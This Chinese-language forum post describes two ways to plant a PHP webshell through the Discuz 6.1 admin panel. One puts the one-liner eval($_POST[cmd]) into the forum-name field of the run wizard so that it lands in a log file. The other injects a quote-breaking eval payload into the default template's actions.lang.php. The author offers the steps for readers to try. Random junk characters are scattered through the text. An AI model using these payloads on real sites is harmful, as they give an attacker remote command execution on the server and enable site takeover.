discuz6.1两种方法后台拿shell7 k& \/ U# x. M/ g7 M" l
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下4 H" B9 \( B7 T+ o$ S% G
1:& h v( I( |4 J9 Y; @
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
! {4 U! y- q. ~5 g; f. F8 C/ gadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell4 F' z: D; a9 g0 }- `5 K
<?php eval($_POST[cmd]);?> h/ `8 }- x" Z$ X& M# n+ O5 Y* C
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& ]! k, W! I; E) W& G4 V: q+ S& t0 F8 w
( \( r0 G0 h8 ?3 \; I; z! S
2:后台模板管理--默认模板套系--详情& g/ `" f: e7 t' b5 ?, y0 {
templates/default/actions.lang.php
% j7 D2 K- R$ J, q( g+ z! ujhackj\\');eval($_POST[cmd])?>;//
) W& y9 v$ p$ A# }5 @
; S* v1 H9 Y* w5 G利用很简单,聪明的人一看就懂了 |